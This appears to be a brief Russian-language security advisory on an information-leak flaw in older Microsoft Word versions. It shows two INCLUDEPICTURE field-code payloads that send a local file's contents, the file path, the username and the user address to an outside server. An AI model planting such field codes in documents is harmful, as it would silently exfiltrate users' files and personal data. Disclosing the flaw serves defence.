Поле INCLUDEPICTURE используется для внедрения URL в документ. Если INCLUDEPICTURE включен в документ и ссылается на URL, то атакующий может получить содержание файлов на системе пользователя. Пример:
{INCLUDEPICTURE {QUOTE "http:\\www.alicesserver.com\" & {FILENAME \p} & {INCLUDETEXT
"c:\\a.txt"}} \d }
{INCLUDEPICTURE {QUOTE "http:\\www.alicesserver.com\" & {USERNAME} & {USERADDRESS } } \d}
Уязвимость обнаружена в Microsoft Word 2000, 2002, 95, 97.